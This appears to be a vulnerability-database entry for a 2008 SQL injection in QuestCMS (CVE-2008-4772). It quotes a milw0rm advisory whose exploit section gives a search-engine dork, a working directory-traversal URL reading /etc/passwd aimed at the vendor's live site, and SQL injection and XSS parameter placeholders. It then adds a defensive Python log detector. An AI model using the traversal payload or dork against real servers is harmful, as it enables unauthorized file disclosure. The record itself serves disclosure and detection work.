Questwork QuestCMS 'main.php' SQL Injection Vulnerability

Vulnerability ID: 1116504    Vulnerability type: SQL injection
Published: 2008-10-27    Updated: 2009-01-29
CVE ID: CVE-2008-4772    CNNVD-ID: CNNVD-200810-481
Platform: PHP    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/6853
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-481
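|Vulnerability Details
main/main.php in QuestCMS contains a SQL injection vulnerability that allows remote attackers to execute arbitrary SQL commands via the obj parameter.
|Exploit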
--------------------------------------------------------------------------------

Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]

--------------------------------------------------------------------------------
#Author: d3b4g


#contact: bl4ckend[at]gmail[dot]com

--------------------------------------------------------------------------------
Affected software:
--------------------------------------------------------------------------------
Application :  Questwork Web Content Management system (QuestCMS)
URL :  http://www.questwork.com

--------------------------------------------------------------------------------

dork        : allinurl:"/questcms/"
--------------------------------------------------------------------------------
Directory traversal vulnerability
=================================
Exploit     : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html

Live demo   : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html


---------------------------------------------------------------------------------

sql injection:
==============
Vuln file:questcms/main/main.php?obj=[sql]


XSS:
====
exploit:/main/main.php?cx=[Xss]
--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

greetz:

All my friends,milw0rm...

--------------------------------------------------------------------------------



--------------------------------- [ www.hotlism.org ] --------------------------------------

# milw0rm.com [2008-10-27]
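
For defenders reviewing web server logs, the following added example (not part of the original advisory or of QuestCMS) flags requests to main/main.php whose `theme`, `obj` or `cx` parameters carry suspicious input. The regex heuristics and the sample log lines are constructed assumptions, not signatures from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters named in the advisory and the issue class reported for each.
WATCHED = {"theme": "directory-traversal", "obj": "sql-injection", "cx": "xss"}

# Heuristic patterns (assumptions of this example; tune for your own traffic).
PATTERNS = {
    "directory-traversal": re.compile(r"\.\.[\\/]|\x00"),
    "sql-injection": re.compile(
        r"['\"]|--|/\*|\bunion\s+select\b|\b(?:or|and)\s+\d+\s*=\s*\d+", re.I),
    "xss": re.compile(r"[<>]|javascript:|\bon\w+\s*=", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so multiply-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return a sorted list of (parameter, issue) findings for one log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/main/main.php"):
        return []
    findings = set()
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        issue = WATCHED.get(name.lower())
        if issue and PATTERNS[issue].search(fully_decode(raw)):
            findings.add((name.lower(), issue))
    return sorted(findings)

# Constructed access-log lines (documentation IP range), for illustration only.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Oct/2008:10:00:01 +0000] "GET /questcms/main/main.php?lang=tc&page=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Oct/2008:10:00:07 +0000] "GET /questcms/main/main.php?lang=tc&page=1&theme=../../etc/passwd%00.html HTTP/1.1" 200 912',
    '203.0.113.9 - - [27/Oct/2008:10:00:09 +0000] "GET /questcms/main/main.php?obj=1%27 HTTP/1.1" 500 0',
    '203.0.113.9 - - [27/Oct/2008:10:00:11 +0000] "GET /questcms/main/main.php?cx=%3Cb%3E HTTP/1.1" 200 4800',
]
```
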
|References

Source: XF
Name: questcms-main-sql-injection(46150)
Link: http://xforce.iss.net/xforce/xfdb/46150
Source: BID
Name: 31945
Link: http://www.securityfocus.com/bid/31945
Source: MILW0RM
Name: 6853
Link: http://www.milw0rm.com/exploits/6853
Source: SREASON
Name: 4523
Link: http://securityreason.com/securityalert/4523